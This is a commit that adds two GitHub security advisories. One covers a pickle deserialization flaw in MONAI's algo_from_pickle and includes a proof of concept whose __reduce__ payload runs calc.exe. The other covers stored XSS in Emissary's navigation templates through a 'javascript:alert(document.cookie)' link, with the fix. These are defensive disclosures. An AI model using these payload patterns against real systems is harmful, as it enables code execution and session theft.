Publish Advisories

GHSA-89gg-p5r5-q6r4
GHSA-cpm7-cfpx-3hvp

Author: advisory-database[bot]

advisories/github-reviewed/2026/04/GHSA-89gg-p5r5-q6r4/GHSA-89gg-p5r5-q6r4.json

@@ -0,0 +1,62 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-89gg-p5r5-q6r4",
+  "modified": "2026-04-07T20:17:21Z",
+  "published": "2026-04-07T20:17:21Z",
+  "aliases": [],
+  "summary": "MONAI: Unsafe functions lead to pickle deserialization rce",
+  "details": "### Summary\nThe `algo_from_pickle` function in `monai/auto3dseg/utils.py` causes `pickle.loads(data_bytes)` to be executed, and it does not perform any validation on the input parameters. This ultimately leads to insecure deserialization and can result in code execution vulnerabilities.\n\n### Details\npoc\n```\nimport pickle\nimport subprocess\nclass MaliciousAlgo:\n    def __reduce__(self):\n        return (subprocess.call, (['calc.exe'],))\nmalicious_algo_bytes = pickle.dumps(MaliciousAlgo())\n\nattack_data = {\n    \"algo_bytes\": malicious_algo_bytes,  \n     \n}\nattack_pickle_file = \"attack_algo.pkl\"\nwith open(attack_pickle_file, \"wb\") as f:\n    f.write(pickle.dumps(attack_data))\n\n```\nGenerate the malicious file \"attack_algo.pkl\" through POC.\n\n```\nfrom monai.auto3dseg.utils import algo_from_pickle\n\n\nattack_pickle_file = \"attack_algo.pkl\"\nresult = algo_from_pickle(attack_pickle_file)\n```\nUltimately, it will trigger pickle.load through a file to identify the command execution.\n\n<img width=\"909\" height=\"534\" alt=\"image\" src=\"https://github.com/user-attachments/assets/071adbb7-3e40-4651-be48-abd2ce32470f\" />\n\nCauses of the vulnerability:\n```\ndef algo_from_pickle(pkl_filename: str, template_path: PathLike | None = None, **kwargs: Any) -> Any:\n\n    with open(pkl_filename, \"rb\") as f_pi:\n            data_bytes = f_pi.read()\n        data = pickle.loads(data_bytes)\n\n```\n\n\n\n### Impact\nArbitrary code execution\n\nRepair suggestions\nVerify the data source and content before deserializing, or use a safe deserialization method",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "PyPI",
+        "name": "monai"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "1.5.2"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 1.5.1"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/Project-MONAI/MONAI/security/advisories/GHSA-89gg-p5r5-q6r4"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/Project-MONAI/MONAI"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/Project-MONAI/MONAI/releases/tag/1.5.2"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-502"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-04-07T20:17:21Z",
+    "nvd_published_at": null
+  }
+}

advisories/github-reviewed/2026/04/GHSA-cpm7-cfpx-3hvp/GHSA-cpm7-cfpx-3hvp.json

@@ -0,0 +1,72 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-cpm7-cfpx-3hvp",
+  "modified": "2026-04-07T20:17:14Z",
+  "published": "2026-04-07T20:17:14Z",
+  "aliases": [
+    "CVE-2026-35571"
+  ],
+  "summary": "Emissary has Stored XSS via Navigation Template Link Injection",
+  "details": "## Summary\n\nMustache navigation templates interpolated configuration-controlled link values\ndirectly into `href` attributes without URL scheme validation. An administrator\nwho could modify the `navItems` configuration could inject `javascript:` URIs,\nenabling stored cross-site scripting (XSS) against other authenticated users\nviewing the Emissary web interface.\n\n## Details\n\n### Vulnerable code — `nav.mustache` (line 10)\n\n```html\n{{#navItems}}\n<li class=\"nav-item\">\n  <a class=\"nav-link\" href=\"{{link}}\">{{display}}</a>\n</li>\n{{/navItems}}\n```\n\nThe `{{link}}` value was rendered without any scheme validation. Mustache's\ndefault HTML escaping protects against injection of new HTML tags but does\n**not** prevent `javascript:` URIs in `href` attributes, since `javascript:`\ncontains no characters that HTML-escaping would alter.\n\n### Attack vector\n\nAn administrator sets a navigation item's link to:\n```\njavascript:alert(document.cookie)\n```\n\nAny authenticated user who clicks the navigation link executes the script in\ntheir browser context.\n\n### Impact\n\n- Session hijacking via cookie theft\n- Actions performed on behalf of the victim user\n- Requires administrative access to modify navigation configuration\n- Requires user interaction (clicking the malicious link)\n\n### Mitigating factors\n\n- Exploitation requires administrative access to modify the `navItems`\n  configuration\n- User interaction (clicking the link) is required\n- The Emissary web interface is typically accessed only by authenticated\n  operators within a trusted network\n\n## Remediation\n\nFixed in [PR #1293](https://github.com/NationalSecurityAgency/emissary/pull/1293),\nmerged into release 8.39.0.\n\n### Server-side link validation — `NavAction.java`\n\nAn allowlist regex was added that only permits `http://`, `https://`, or\nsite-relative (`/`) URLs:\n\n```java\nprivate static final Pattern VALID_LINK = Pattern.compile(\"^(https?:/)?/.*\");\n\nprivate static boolean isValidLink(String link) {\n    if (!VALID_LINK.matcher(link).matches()) {\n        logger.warn(\"Skipping invalid navigation link '{}'\", link);\n        return false;\n    }\n    return true;\n}\n```\n\nInvalid links are logged and silently dropped from the rendered navigation.\n\n### Template hardening — `nav.mustache`\n\nAdded `rel=\"noopener noreferrer\"` to all navigation link anchor tags as a\ndefense-in-depth measure:\n\n```html\n<a class=\"nav-link\" href=\"{{link}}\" rel=\"noopener noreferrer\">{{display}}</a>\n```\n\nTests were added to verify that `javascript:` and `ftp://` URIs are rejected\nwhile `http://`, `https://`, and site-relative (`/path`) links are accepted.\n\n## Workarounds\n\nIf upgrading is not immediately possible, audit the navigation configuration\nto ensure all `navItems` link values use only `http://`, `https://`, or\nrelative (`/`) URL schemes.\n\n## References\n\n- [PR #1293 — validate nav links](https://github.com/NationalSecurityAgency/emissary/pull/1293)\n- Original report: GHSA-wjqm-p579-x3ww",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Maven",
+        "name": "gov.nsa.emissary:emissary"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "8.39.0"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 8.38.0"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/NationalSecurityAgency/emissary/security/advisories/GHSA-cpm7-cfpx-3hvp"
+    },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35571"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/NationalSecurityAgency/emissary/pull/1293"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/NationalSecurityAgency/emissary/commit/e2078417464b9004620dde28dcbca2f73ea06c13"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/NationalSecurityAgency/emissary"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-79"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-04-07T20:17:14Z",
+    "nvd_published_at": "2026-04-07T16:16:29Z"
+  }
+}